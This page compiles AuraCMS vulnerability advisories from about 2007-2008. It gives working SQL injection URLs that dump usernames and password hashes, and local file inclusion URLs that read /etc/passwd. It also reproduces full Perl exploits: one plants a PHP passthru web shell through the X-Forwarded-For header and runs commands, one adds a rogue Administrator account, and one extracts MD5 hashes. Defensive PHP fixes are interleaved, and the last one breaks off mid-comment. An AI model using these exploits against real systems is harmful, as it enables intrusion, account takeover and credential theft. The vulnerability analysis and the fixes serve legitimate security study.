AuraCMS [Forum Module] Remote SQL Injection Vulnerability

SQL injection in the Forum module. The vulnerability exists because the script komentar.php (lines 27-29) does not filter the data received in the $id variable, so arbitrary queries can be executed against the database. Found by a guy with the nick k1tk4t.

Vulnerable query:
PHP:
select topikid, subjek, pengirim,reply, waktu, isi from ".$prefix."forum_topik where topikid=$id");

Exploit:
Code:
http://localhost/AuraCMS/?pilih=forum&mod=yes&aksi=komentar&id=-9%20union%20select%201,user,id,4,email,password%20from%20user/*

=========================================================

AuraCMS version 1.5rc - Multiple Remote SQL Injection Vulnerabilities

SQL injection in the scripts 'hal.php', 'cetak.php', 'lihat.php', 'pesan.php', 'teman.php'. Version: 1.5rc (possibly earlier ones too). Found by the same guy, k1tk4t. So, let's go through them one by one…

hal.php
Vulnerable query:
PHP:
$perintah="SELECT * FROM halaman WHERE id=$id";
$hasil = mysql_query( $perintah );
Exploit:
Code:
http://localhost/auracms15/?pilih=hal&id=-9%20UNION%20SELECT%200,user,password%20from%20user/*

-------------------------------------------------------------------------------------------

cetak.php
Vulnerable query:
PHP:
$perintah="SELECT * FROM artikel WHERE id=$id AND publikasi=1";
$hasil = mysql_query( $perintah );
Exploit:
Code:
http://localhost/auracms15/cetak.php?id=-9%20UNION%20SELECT%20null,null,null,password,null,user,null,null%20from%20user/*

-------------------------------------------------------------------------------------------

lihat.php
Vulnerable query:
PHP:
$perintah="SELECT * FROM artikel WHERE id=$id AND publikasi=1";
$hasil = mysql_query( $perintah );
Exploit:
Code:
http://localhost/AuraCMS1.5/?pilih=lihat&id=-9%20UNION%20SELECT%20null,user,password,null,null,null,null,null%20from%20user/*

-------------------------------------------------------------------------------------------

pesan.php
Vulnerable query:
PHP:
$perintah="SELECT * FROM artikel WHERE id=$id AND publikasi=1";
} else {
$perintah="SELECT * FROM komentar WHERE id=$id";
Exploit:
Code:
http://localhost/AuraCMS1.5/?pilih=pesan&id=-9%20UNION%20SELECT%20null,null,null,concat(user,0x3a,password),null,null,null,null%20from%20user/*

----------------------------------------------------

teman.php
Vulnerable query:
PHP:
$perintah="SELECT * FROM artikel WHERE id=$id AND publikasi=1";
$hasil = mysql_query( $perintah );
Exploit:
Code:
http://localhost/AuraCMS1.5/?pilih=teman&id=-9%20UNION%20SELECT%20null,concat(user,0x3a,password),null,null,null,null,null,null%20from%20user/*

=====================================================

AuraCMS 2.1 - Remote File Attachment - Local File Inclusion

Local File Inclusion. This bug was found by the same guy, k1tk4t. Version 2.1 (possibly earlier ones too). The vulnerability is in the script '/mod/contak.php'.

Vulnerable code:
PHP:
if ($_POST['submit']) {
    $nama = text_filter($_POST['nama']);
    $email = text_filter($_POST['email']);
    $pesan = nl2br(text_filter($_POST['pesan'], 2));
    $images = text_filter($_POST['image']);
    checkemail($email);
    $gfx_check = intval($_POST['gfx_check']);
    if (!$nama) $error .= "Error: Please enter your name!<br />";
    if (!$pesan) $error .= "Error: Please enter a message!<br />";
    $code = substr(hexdec(md5("".date("F j")."".$_POST['random_num']."".$sitekey."")), 2, 6);
    if (extension_loaded("gd") AND $code != $_POST['gfx_check']) $error .= "Error: Security Code Invalid<br />";
    if ($error) {
        $tengah.='<table width="100%" border="0" cellspacing="0" cellpadding="0" class="middle"><tr><td><table width="100%" class="bodyline"><tr><td align="left"><img src="images/warning.gif" border="0"></td><td align="center"><font class="option">'.$error.'</font></td><td align="right"><img src="images/warning.gif" border="0"></td></tr></table></td></tr></table>';
    } else {
        if (!empty ($image_name)){
            $image_name = $_FILES['image']['name'];
            $image_temp = $_FILES['image']['tmp_name'];
            $tempat = "files/";
            @copy($_FILES[image][tmp_name], "./files/".$image_name);
            if(@copy($_FILES[image][tmp_name], "./files/".$image_name)){
                unlink($image);
                $sukses = "Sukses Upload File ".$image_name;
            }else{
                $sukses = "Gagal Upload File ".$image_name;
Exploit:
Code:
http://localhost/auracms2.1/index.php?pilih=../mod/contak

-------------------------------------------------------------------------------------------

The index.php script
Vulnerable code:
PHP:
if (isset ($_GET['mod'])) $mod = $_GET['mod'] ; else $mod = '';
if(!isset($_GET['pilih'])){
    include 'content/normal.php';
}else {
    if($mod == "yes" && file_exists("mod/$_GET[pilih].php")){
        include "mod/$_GET[pilih].php";
    } else {
        if (eregi('http://', $_GET['pilih']) or !file_exists("content/$_GET[pilih].php") or $_GET['pilih'] == 'index'){
            $_GET['pilih'] = 'normal';
Exploit:
Code:
http://localhost/auracms.x.x/index.php?pilih=../../../../../../../etc/passwd%00

---------------------------------------------------------------------------------------------

The index.php script (version 1.x)
Vulnerable code:
PHP:
<?
if(!isset($pilih))$pilih='';
switch($pilih){
    case '':
        include "normal.php";
        break;
    default:
        if($mod == "yes" && file_exists("mod/$pilih.php")){
            include "mod/$pilih.php";
        } else {
            if (eregi('http://', $pilih) or !file_exists("$pilih.php")){
                $pilih = 'normal';
            }
            include "$pilih.php";
        }
        break;
}
?>
Exploit:
Code:
http://localhost/auracms.x.x/index.php?pilih=../../../../../../../etc/passwd%00

==========================================================

AuraCMS 1.62 - (stat.php) Remote Code Execution Exploit

Arbitrary code execution. Vulnerable script: stat.php.
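The root cause shared by the three index.php excerpts above is that a request parameter is spliced into an include path, with only a `file_exists()` and an `eregi('http://', ...)` test in between; neither stops `../` or, on the old PHP releases this CMS ran on, the `%00` byte that truncates the path after the check. The following dispatcher is an added example written for this page, not AuraCMS code: it accepts only names from a fixed allow-list, rejects any character outside `[a-z0-9_]` before touching the filesystem, and confirms with `realpath()` that the resolved file still lies under the intended directory. The `mod/` and `content/` layout is taken from the advisory; the module names in the allow-lists and the helper names are assumptions.

```php
<?php
// Added example (not AuraCMS code): a dispatcher that replaces
// include "mod/$_GET[pilih].php" with an allow-list plus a containment check.
// ALLOWED_MODULES / ALLOWED_CONTENT and the helper names are assumptions.

declare(strict_types=1);

// Only these names may ever be included; anything else is refused.
const ALLOWED_MODULES = ['forum', 'stat', 'gallery', 'news'];
const ALLOWED_CONTENT = ['normal', 'hal', 'lihat', 'cetak', 'pesan', 'teman', 'user'];

/**
 * Resolve a user-supplied page name to a file under $baseDir, or return null.
 * Three independent checks: a strict character class (so "/", ".", NUL and
 * "http://" can never pass), membership in the allow-list, and a realpath()
 * comparison proving the resolved file is still inside $baseDir.
 */
function resolve_page(string $name, string $baseDir, array $allowed): ?string
{
    if (!preg_match('/^[a-z0-9_]{1,32}$/', $name)) {
        return null;                       // "../", "%00", "http://" all stop here
    }
    if (!in_array($name, $allowed, true)) {
        return null;                       // not a known page
    }
    $base = realpath($baseDir);
    $file = realpath($baseDir . '/' . $name . '.php');
    if ($base === false || $file === false) {
        return null;                       // missing file: fall back instead of guessing
    }
    // realpath() has removed ".." and symlinks; the result must still sit under $base.
    if (strncmp($file, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $file;
}

/** Pick the file index.php should include for this request. */
function dispatch(array $get, string $appRoot): string
{
    $raw   = $get['pilih'] ?? 'normal';
    $pilih = is_string($raw) ? $raw : 'normal';       // arrays from ?pilih[]=x are ignored
    $isMod = (($get['mod'] ?? '') === 'yes');

    $file = $isMod
        ? resolve_page($pilih, $appRoot . '/mod', ALLOWED_MODULES)
        : resolve_page($pilih, $appRoot . '/content', ALLOWED_CONTENT);

    // Unknown or rejected names always land on the default page.
    return $file ?? $appRoot . '/content/normal.php';
}

// Usage inside index.php (assumed layout):
// include dispatch($_GET, __DIR__);
```

The character-class test alone would already block the two exploit URLs shown; the allow-list and the `realpath()` containment check are there so that a future mistake in one of the other checks does not reopen the include.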
Version 1.62 (possibly earlier ones too)

Exploit:
Code:
#!/usr/bin/perl
#
# Indonesian Newhack Security Advisory
# ------------------------------------
# AuraCMS 1.62 - (stat.php) Remote Code Execution Exploit
# Date        : Jan 16 2008 10:00PM
# Software    : AuraCMS 1.62
#               AuraCMS Mod Block Statistik | http://iwan.or.id/download/lihat/1/2-1-6.html
# Vendor      : http://www.auracms.org/
# Found by    : k1tk4t | http://newhack.org
# Location    : Indonesia
# Description :
#
# Bug in the file "stat.php" inside the /mod directory of the AuraCMS 1.62 web application
# ---//---
# 17. Function User_Online ($minutes, $NamaFile){
# 18.   //$ip = $REMOTE_ADDR;
# 19.   $ip = getenv("HTTP_X_FORWARDED_FOR");
# 20.   if (getenv("HTTP_X_FORWARDED_FOR") == ''){
# 21.     $ip = getenv("REMOTE_ADDR");
# 22.   }
# ---//---
# 47.   fseek($f,0,SEEK_SET);
# 48.   ftruncate($f,0);
# 49.   array_pop($user);
# 50.   foreach ($user as $line)
# 51.   {
# 52.     list($savedip,$savedtime) = split("\|",$line);
# 53.     if ($savedip == $ip) {$savedtime = $time;$found = 1;}
# 54.     if ($time < $savedtime + ($minutes * 60))
# 55.     {
# 56.       fputs($f,"$savedip|$savedtime\n");
# 57.       $users = $users + 1;
# 58.     }
# 59.   }
# 60.
# 61.   if ($found == 0)
# 62.   {
# 63.     fputs($f,"$ip|$time\n");
# 64.     $users = $users + 1;
# 65.   }
# 66.
# 67.   fclose ($f);
# ---//---
#
# For example;
# $ip = getenv("HTTP_X_FORWARDED_FOR");
# $ip = <?php phpinfo() ?>            <-- the user injects phpinfo
# stored format
# <?php phpinfo() ?>|VISITTIME
#
# in AuraCMS version 1.62 the log is stored in the file /mod/online.db.txt [Default]
#
# in Mod Block Statistik the log is stored in the file /logs/online.db.txt [Default]
#
# in AuraCMS version 2.x mod "online", getenv("HTTP_X_FORWARDED_FOR") can result in "SQL Injection"
#
# => "Fix for the stat.php bug"
# ---//---
# 19.   $ip = getenv("HTTP_X_FORWARDED_FOR");
# 20.   if (preg_match('/^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$/', getenv("HTTP_X_FORWARDED_FOR")) == ''){
# 21.     $ip = getenv("REMOTE_ADDR");
# 22.   }
# ---//---
#
# This exploit was made for learning, testing and proving what we have studied;
# I [k1tk4t] and "Indonesian Newhack Technology" are not responsible for damage
# caused by misuse of the exploit by other parties
#
# =>
# Thanks to;
# -[opt1lc, fl3xu5, ghoz]-
# str0ke, DNX, xoron, y3dips, L41n, cyb3rh3b, K-159, the_hydra, NoGe
# nyubi, iFX, sin~X, k1n9k0ng, bius, selikoer, aldy_BT
# Indonesian Security and Hacker Community
#
# ----------------------------[Start]------------------------------------

use IO::Socket;

if(!$ARGV[2]) {
    print "\n |-------------------------------------------------------|";
    print "\n |             Indonesian Newhack Technology             |";
    print "\n |-------------------------------------------------------|";
    print "\n | AuraCMS 1.62 (stat.php) Remote Code Execution Exploit |";
    print "\n |                    Coded by k1tk4t                    |";
    print "\n |-------------------------------------------------------|";
    print "\n[!] ";
    print "\n[!] Penggunaan : perl auracms22.pl [Site] [Path] [Port]";
    print "\n[!] Contoh     : perl auracms22.pl localhost /aura162/ 80";
    print "\n[!] ";
    print "\n";
    exit;
}

$oriserver = $ARGV[0];
$orihost   = "http://".$oriserver;
$oridir    = $ARGV[1];
$oriport   = $ARGV[2];

print "- Melakukan Koneksi $orihost$oridir\r\n";

$injurl  = "index.php?pilih=stat&mod=yes";
$injeksi = $oridir.$injurl;
$kodeterlarang = "<?php echo t4mugel4p;error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()){\$_GET[cmd]=stripslashes(\$_GET[cmd]);}passthru(\$_GET[cmd]);die;?>";

print "- Sedang menginjeksi kode jahat\r\n";
$injkode = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$oriserver", PeerPort => "$oriport") || die "- Koneksi Gagal...\r\n";
print $injkode "GET ".$injeksi." HTTP/1.1\n";
print $injkode "Host: ".$oriserver."\r\n";
print $injkode "X-Forwarded-For: ".$kodeterlarang."\r\n";
print $injkode "\r\n\r\n";
close ($injkode);

while($perintah !~ "mati") {
    $ekseurl  = "index.php?pilih=online.db.txt%00&mod=yes&cmd=".$perintah."";
    $eksekusi = $oridir.$ekseurl;
    print "- Sedang mencoba menjalankan kode injeksi\r\n";
    $eksekode = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$oriserver", PeerPort => "$oriport") || die "- Koneksi Gagal...\r\n";
    print $eksekode "GET ".$eksekusi." HTTP/1.1\n";
    print $eksekode "Host: ".$oriserver."\r\n";
    print $eksekode "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11";
    print $eksekode "Accept: */*\r\n";
    print $eksekode "Connection: close\r\n\n";
    while ($hasil = <$eksekode>) {
        print $hasil;
    }
    print "[+]perintah => ";
    $perintah = <STDIN>;
}

# milw0rm.com [2008-01-18]
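The advisory's own fix validates X-Forwarded-For against an IPv4 regex before it is written to online.db.txt. The following is an added example for this page, not AuraCMS code, that takes the same idea two steps further: the forwarded header is only consulted when the TCP peer is a known proxy (otherwise any client can put whatever it likes in the header), the value is validated with `filter_var()` so IPv6 is handled as well, and the record is validated once more at write time. `TRUSTED_PROXIES`, the function names and the constructed requests at the bottom are assumptions. The log file should also live outside the web root so that nothing written there is reachable by an include.

```php
<?php
// Added example (not AuraCMS code): derive the visitor IP for the
// "users online" log without trusting X-Forwarded-For blindly.
// TRUSTED_PROXIES, the helper names and the sample requests are assumptions.

declare(strict_types=1);

// Only when the TCP peer is one of these may a forwarded header be believed.
const TRUSTED_PROXIES = ['10.0.0.5', '10.0.0.6'];

/**
 * Return a syntactically valid client IP, falling back to the direct peer.
 * X-Forwarded-For is a comma-separated list that each proxy appends to; the
 * part the client controls is the first element, so it is validated with
 * filter_var() instead of being used as-is. Anything that is not an IP
 * address (a PHP tag payload, for instance) is discarded.
 */
function client_ip(array $server): string
{
    $peer = filter_var($server['REMOTE_ADDR'] ?? '', FILTER_VALIDATE_IP);
    if ($peer === false) {
        return '0.0.0.0';
    }
    $xff = $server['HTTP_X_FORWARDED_FOR'] ?? '';
    if ($xff === '' || !in_array($peer, TRUSTED_PROXIES, true)) {
        return $peer;                         // no trusted proxy in front: ignore the header
    }
    $first = trim(explode(',', $xff)[0]);
    $valid = filter_var($first, FILTER_VALIDATE_IP);
    return $valid === false ? $peer : $valid;  // garbage in the header: keep the peer
}

/**
 * Append an "ip|time" record. The value is re-validated here so that a
 * caller which forgot client_ip() still cannot write arbitrary text, and
 * $logFile is expected to be outside the document root.
 */
function log_visit(string $logFile, string $ip, int $time): bool
{
    if (filter_var($ip, FILTER_VALIDATE_IP) === false) {
        return false;
    }
    return file_put_contents($logFile, "$ip|$time\n", FILE_APPEND | LOCK_EX) !== false;
}

// Constructed request 1: a direct client puts a payload in X-Forwarded-For.
$direct = [
    'REMOTE_ADDR'          => '203.0.113.9',
    'HTTP_X_FORWARDED_FOR' => '<?php phpinfo() ?>',
];
var_dump(client_ip($direct));    // string(11) "203.0.113.9": header ignored, peer is not a proxy

// Constructed request 2: the same payload arrives through a trusted proxy.
$viaProxy = [
    'REMOTE_ADDR'          => '10.0.0.5',
    'HTTP_X_FORWARDED_FOR' => '<?php phpinfo() ?>, 10.0.0.5',
];
var_dump(client_ip($viaProxy));  // string(8) "10.0.0.5": first element fails validation

// Constructed request 3: a legitimate forwarded client.
$ok = ['REMOTE_ADDR' => '10.0.0.6', 'HTTP_X_FORWARDED_FOR' => '198.51.100.7'];
var_dump(client_ip($ok));        // string(12) "198.51.100.7"
```

The second half of the exploit (`pilih=online.db.txt%00`) works only because index.php will include a file named by the request; validating the header closes the write side, and an allow-listed include dispatcher closes the read side, so the fix is not complete until both are in place.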
AuraCMS 2.2 - (admin_users.php) Remote Add Administrator Exploit

Code:
#!/usr/bin/perl
#
# Indonesian Newhack Security Advisory
# ------------------------------------
# AuraCMS 2.2 - (admin_users.php) Remote Add Administrator Exploit
# Date        : Dec 25 2007 04:50AM
# Software    : AuraCMS 2.2
# Vendor      : http://www.auracms.org/
# Found by    : k1tk4t | http://newhack.org
# Location    : Indonesia
# Description :
#
# Bug in the file "admin_users.php"
# let's take a look ;
# 01. <?
# 02. if(ereg(basename (__FILE__), $_SERVER['PHP_SELF']))
# 03. {
# 04.   header("HTTP/1.1 404 Not Found");
# 05.   exit;
# 06. }
# ---//---
# 12. if (!cek_login()){
# 13.   header("location: index.php");
# 14.   exit;
# 15. } else{
# ---//----
# There is something interesting in the file "admin_users.php": at lines 02 - 06 this file is actually already reasonably safe,
# because if it is called directly from the browser [http://target.com/admin/admin_users.php] it answers Not Found and exits
# mmm....!!! now look at lines 12 - 15: if "cek_login()" passes, execution continues to the following commands.
# This is where we try to 'play' ;)
# the function "cek_login()" only checks the login status through the session cookie, for every login level [user,editor,administrator]
# So "admin_users.php" can be accessed by a user of any level [but not by a GUEST],
#
# => So how do we reach it, isn't "admin_users.php" impossible to call directly [lines 02 - 06] ?
# yup, right ;) "admin_users.php" cannot be called directly through the browser, so now let's look at the file "index.php" ;
# ---//---
# 71. if(!isset($_GET['pilih'])){
# 72.   include 'content/normal.php';
# 73. }else if (@$_GET['mod'] == 'yes' && file_exists('mod/'.@$_GET['pilih'].'/'.@$_GET['pilih'].'.php') && !isset($_GET['act']) && !preg_match("/\.\./",$_GET['pilih'])) {
# 74.   include 'mod/'.$_GET['pilih'].'/'.$_GET['pilih'].'.php';
# 75. }else if (@$_GET['mod'] == 'yes' && file_exists('mod/'.@$_GET['pilih'].'/'.@$_GET['act'].'.php') && !preg_match("/\.\./",$_GET['pilih'])) {
# 76.   include 'mod/'.@$_GET['pilih'].'/'.@$_GET['act'].'.php';
# 77. }else if(!isset($_GET['mod']) && !isset($_GET['act']) && file_exists('content/'.$_GET['pilih'].'.php') && !preg_match("/\.\./",$_GET['pilih'])) {
# 78.   include 'content/'.$_GET['pilih'].'.php';
# 79. }else {
# 80.   header("location: index.php");
# 81.   exit;
# 82. }
# ---//---
# mm... look at that code... interesting, isn't it?
# yes, it is through this "index.php" that we can reach "admin_users.php", or in other words defeat lines 02 - 06 of "admin_users.php",
#
# => I see..., so how do we fix it ?
# hehehe...
# try replacing lines 02 - 06 of the file "admin_users.php" with ;
# ---//---
# 02. if (!defined('AURACMS_admin')) {
# 03.   Header("Location: ../index.php");
# 04.   exit;
# 04. }
# ---//--
# That code actually already exists in the other admin files, except in these files ;
# "admin_users.php"
# "admin_poll.php"
# "admin_kalender.php"
#
# => Anything else ?
# This exploit was made purely for testing, not for illegal activities
# I [k1tk4t] and "Indonesian Newhack Technology" are not responsible for damage caused by misuse of the exploit on a site
#
# =>
# Thanks to;
# -[opt1lc, fl3xu5, ghoz]-
# str0ke, DNX, xoron, cyb3rh3b, K-159, the_hydra, y3dips
# nyubi,iFX,sin~X,k1n9k0ng,bius,selikoer,aldy_BT
# Indonesian Security and Hacker Community
#
# ----------------------------[Start]------------------------------------

use IO::Socket;

if(!$ARGV[4]) {
    print "\n |--------------------------------------------------------|";
    print "\n |             Indonesian Newhack Technology              |";
    print "\n |--------------------------------------------------------|";
    print "\n |AuraCMS 2.2 - (admin_users.php) Remote Add Admin Exploit|";
    print "\n |                    Coded by k1tk4t                     |";
    print "\n |--------------------------------------------------------|";
    print "\n[!] ";
    print "\n[!] Buat Account terlebih dahulu pada site target dan pastikan Account tesebut bisa digunakan";
    print "\n[!] Username dan Password tadi akan digunakan untuk membuat Account admin dengan exploit ini";
    print "\n[!] Penggunaan : perl auracms22.pl [Site] [Path] [Port] [Username] [Password] ";
    print "\n[!] Contoh     : perl auracms22.pl target.com /auracms2.2/ 80 bugtest 123456";
    print "\n[!] ";
    print "\n";
    exit;
}

$oriserver = $ARGV[0];
$orihost   = "http://".$oriserver;
$oridir    = $ARGV[1];
$oriport   = $ARGV[2];
$oriuser   = $ARGV[3];
$oripass   = $ARGV[4];

# Sending data...
print "- Melakukan Koneksi $orihost$oridir\r\n\r\n";
logindulu();

sub logindulu () {
    $ldberkas  = "index.php";
    $ldlengkap = $oridir.$ldberkas;
    $lddata  = "username=".$oriuser;
    $lddata .= "&password=".$oripass;
    $lddata .= "&loguser=1";
    $lddata .= "&submit_login=Login";
    $lddatajml = length($lddata);
    $ldkonek = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$oriserver", PeerPort => "$oriport") || die "- Connection failed...\r\n";
    print $ldkonek "POST $ldlengkap HTTP/1.1\n";
    print $ldkonek "Accept: */*\r\n";
    print $ldkonek "Referer: $orihost\r\n";
    print $ldkonek "Accept-Language: en-us,en;q=0.5\r\n";
    print $ldkonek "Content-Type: application/x-www-form-urlencoded\r\n";
    print $ldkonek "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11\r\n";
    print $ldkonek "Host: $oriserver\r\n";
    print $ldkonek "Content-length: $lddatajml\r\n";
    print $ldkonek "Connection: Keep-Alive\r\n";
    print $ldkonek "Cache-Control: no-cache\r\n\r\n";
    print $ldkonek $lddata;
    print $ldkonek "\r\n\r\n";
    while ($hasil = <$ldkonek>) {
        if ($hasil =~ /Set-Cookie: (.*?) path=\//) {
            $ldkonekcookie = $ldkonekcookie.$1;
        }
        if ($hasil =~ /<b>$oriuser<\/b>/) {
            buatadmin();
        }
    }
    die "- Gagal Login\r\n";
}

sub buatadmin () {
    close ($ldkonek);
    print "- Membuat User t4mugel4p dengan level Administrator\r\n\r\n";
    $baberkas  = "index.php?pilih=news&act=../../admin/admin_users&mod=yes&aksi=add";
    $balengkap = $oridir.$baberkas;
    $badata  = "user=t4mugel4p";
    $badata .= "&password=t4mugel4p";
    $badata .= "&email=t4mugel4p%40gelapbanget.gitu";
    $badata .= "&level=Administrator";
    $badata .= "&tipe=aktif";
    $badata .= "&add_users=Add";
    $badatajml = length($badata);
    $bakonek = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$oriserver", PeerPort => "$oriport") || die "- Connection failed...\r\n";
    print $bakonek "POST $balengkap HTTP/1.1\r\n";
    print $bakonek "Accept: */*\r\n";
    print $bakonek "Referer: $orihost.$balengkap\r\n";
    print $bakonek "Accept-Language: en-us,en;q=0.5\r\n";
    print $bakonek "Content-Type: application/x-www-form-urlencoded\r\n";
    print $bakonek "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11\r\n";
    print $bakonek "Cookie: $ldkonekcookie\r\n";
    print $bakonek "Host: $oriserver\r\n";
    print $bakonek "Content-length: $badatajml\r\n";
    print $bakonek "Connection: Keep-Alive\r\n";
    print $bakonek "Cache-Control: no-cache\r\n\r\n";
    print $bakonek $badata;
    print $bakonek "\r\n\r\n";
    while ($hasil = <$bakonek>) {
        if ($hasil =~ /Data Berhasil Di add/) {
            print "- Exploiting Selesai dan SUKSES !!!\r\n\r\n";
            print "- Login admin menggunakan\r\n";
            print "- Username : t4mugel4p\r\n";
            print "- Password : t4mugel4p\r\n\r\n";
            print "- Pada site $orihost$ldlengkap\r\n";
            exit();
        }
        if ($hasil =~ /(Data Berhasil Di add)/) {
            print "- Exploit Gagal\r\n";
            exit();
        }
    }
    die "- Exploit Gagal\r\n";
}

# milw0rm.com [2007-12-25]

Additionally:
admin.php – the admin panel itself
/include/config.php – the DB config
useraura – the users table
Field names: UserId, user, password
Passwords are hashed with plain md5
Developers' site: http://auracms.org
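Two separate weaknesses combine in the advisory above: the `..` filter on line 75 of index.php is applied to `$_GET['pilih']` but not to `$_GET['act']`, and admin_users.php relies on `cek_login()`, which proves only that some account is logged in. The block below is an added example for this page, not AuraCMS code. It shows the guard the advisory proposes (a constant that only the admin front controller defines) combined with an explicit role check, and a module resolver that applies the same character class to both request parameters. The session keys, the front-controller layout and the helper names are assumptions.

```php
<?php
// Added example (not AuraCMS code): guard every admin_*.php with the
// AURACMS_admin constant from the advisory plus an explicit role check, and
// validate both index.php parameters. Session keys and names are assumptions.

declare(strict_types=1);

// --- admin/index.php (assumed front controller) -----------------------------
// define('AURACMS_admin', true);
// session_start();
// require_admin_context($_SESSION);
// require __DIR__ . '/admin_users.php';

/**
 * Refuse to run unless (1) the admin front controller included this file and
 * (2) the session belongs to an Administrator. Check 1 replaces the fragile
 * basename/PHP_SELF test and also fails for index.php's mod/act include path;
 * check 2 is what cek_login() in the advisory never did.
 */
function require_admin_context(array $session): void
{
    if (!defined('AURACMS_admin')) {
        header('Location: ../index.php');
        exit;
    }
    $loggedIn = ($session['logged_in'] ?? false) === true;
    $level    = $session['level'] ?? '';
    if (!$loggedIn || $level !== 'Administrator') {
        header('HTTP/1.1 403 Forbidden');
        exit;
    }
}

/**
 * Resolve mod/<pilih>/<act>.php for index.php. Both parts must match the same
 * strict pattern, so "../../admin/admin_users" in either one is rejected
 * before file_exists() is consulted. Returns null when the request is refused.
 */
function safe_module_path(string $pilih, string $act): ?string
{
    foreach ([$pilih, $act] as $part) {
        if (!preg_match('/^[a-z0-9_]{1,32}$/', $part)) {
            return null;
        }
    }
    $file = "mod/$pilih/$act.php";
    return is_file($file) ? $file : null;
}

// Constructed inputs: the advisory's request versus a normal one.
var_dump(safe_module_path('news', '../../admin/admin_users'));  // NULL: "act" rejected
var_dump(safe_module_path('news', 'news'));                     // string path or NULL if absent
```

Even with the resolver in place, the constant-plus-role guard inside each admin file is worth keeping: it makes the authorization decision local to the sensitive code instead of depending on every include site getting its path filtering right.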
AuraCMS 2.2 (gallery_data.php) Remote SQL Injection Exploit

SQL Injection. Vulnerable: AuraCMS 2.2

Exploit:
Code:
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Cookies;
use Getopt::Long;
#
# [!] Discovered.: DNX
# [!] Vendor.....: http://www.auracms.org
# [!] Detected...: 19.01.2008
# [!] Reported...: 25.01.2008
# [!] Response...: 30.01.2008
#
# [!] Background.: AuraCMS is a CMS based on PHP and SQL
#
# [!] Bug........: $_GET['albums'] in mod/gallery/ajax/gallery_data.php near line 173
#
#     173: case 'detail':
#     174:   if (isset($_GET['id'])){
#     175:     $id = $_GET['id'];
#     176:     $albums = $_GET['albums'];
#
#     200: $query = mysql_query ("SELECT * FROM `mod_gallery` WHERE `kid` = '$albums' $SQL_SORT LIMIT $image,$limitimage");
#
# [!] Solution...: Install gallery update!
#

if(!$ARGV[1]) {
    print "\n       \\#'#/ ";
    print "\n       (-.-) ";
    print "\n ---------------------oOO---(_)---OOo--------------------";
    print "\n | AuraCMS v2.2 (gallery_data.php) Remote SQL Injection |";
    print "\n |         (works only with magic quotes = off)         |";
    print "\n |                     coded by DNX                     |";
    print "\n --------------------------------------------------------";
    print "\n[!] Usage......: perl aura.pl [Host] [Path] <Options>";
    print "\n[!] Example....: perl aura.pl 127.0.0.1 /auracms/";
    print "\n[!] Options....:";
    print "\n    -p [ip:port]  Proxy support";
    print "\n";
    exit;
}

my $host = $ARGV[0];
my $path = $ARGV[1];
my %options = ();
GetOptions(\%options, "p=s");

print "[!] Exploiting...\n";
exploit();
print "\n[!] Exploit done\n";

sub exploit {
    my $url1 = "http://".$host.$path."index.php?pilih=gallery&mod=yes";
    my $url2 = "http://".$host.$path."mod/gallery/ajax/gallery_data.php";
    my $ua = LWP::UserAgent->new;
    my $cookie = HTTP::Cookies->new();
    my $regexp = ":\"(.*?)\",\"name\"(.*)([a-fA-F0-9]{32})";
    my $res = "";

    if($options{"p"}) {
        $ua->proxy('http', "http://".$options{"p"});
    }

    ###############
    # exist file? #
    ###############
    $res = $ua->get($url2);
    if(!$res->is_success) {
        die("[!] Failed, file not found\n");
    }

    ##########################
    # get cookie from server #
    ##########################
    $res = $ua->get($url1);
    $cookie->extract_cookies($res);
    $ua->cookie_jar($cookie);
    $ua->get($url2);
    $res = $ua->get($url2);

    ######################
    # check magic quotes #
    ######################
    $url2 .= "?action=detail&id=&image=&albums='";
    $res = $ua->get($url2);
    $content = $res->content;
    if($content =~ /,\"albums\":\[\"\\\\'\"],/) {
        die("[!] Failed, magic quotes on\n")
    }

    ##############
    # get hashes #
    ##############
    $url2 .= "%20union%20select%20user,2,3,4,5,6,7,password,9,10%20from%20useraura/*";
    $res = $ua->get($url2);
    $content = $res->content;
    my @cont = split(/{\"files\"/, $content);
    foreach (@cont) {
        if($_ =~ /$regexp/) {
            print "$1 $3\n";
        }
    }
}
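Both the integer `id` queries in the 1.5rc advisories near the top of this page (`SELECT * FROM halaman WHERE id=$id` and friends) and the string `kid` query in gallery_data.php above have the same defect: request data is interpolated into the SQL text, so the only thing standing between the attacker and the `user`/`useraura` table is `magic_quotes_gpc`, which the gallery exploit explicitly probes for. The block below is an added example for this page, not AuraCMS code, rewriting one query of each kind with mysqli prepared statements; table and column names are those quoted in the advisories, while the connection parameters, the sort-column allow-list and the function names are assumptions.

```php
<?php
// Added example (not AuraCMS code): the integer-id query from hal.php and
// the string `kid` query from gallery_data.php using mysqli prepared
// statements. Connection values, sort columns and helper names are assumptions.

declare(strict_types=1);

function db(): mysqli
{
    $db = new mysqli('localhost', 'DB_USER', 'DB_PASS', 'auracms'); // placeholders
    $db->set_charset('utf8mb4');
    return $db;
}

/**
 * hal.php: "SELECT * FROM halaman WHERE id=$id"
 * The id is validated as an integer and then bound with type 'i', so a value
 * such as "-9 UNION SELECT ..." is refused up front and could not alter the
 * statement even if it got through. Requires mysqlnd for get_result().
 */
function fetch_page(mysqli $db, $rawId): ?array
{
    if (filter_var($rawId, FILTER_VALIDATE_INT) === false) {
        return null;                                  // reject rather than coerce garbage
    }
    $id = (int)$rawId;
    $stmt = $db->prepare('SELECT * FROM halaman WHERE id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

/**
 * gallery_data.php: "SELECT * FROM `mod_gallery` WHERE `kid` = '$albums' $SQL_SORT LIMIT ..."
 * The album key is bound as a string ('s'); the driver handles quoting, so
 * whether magic_quotes_gpc is on or off no longer matters. An ORDER BY
 * column cannot be bound, so it is chosen from an allow-list instead of
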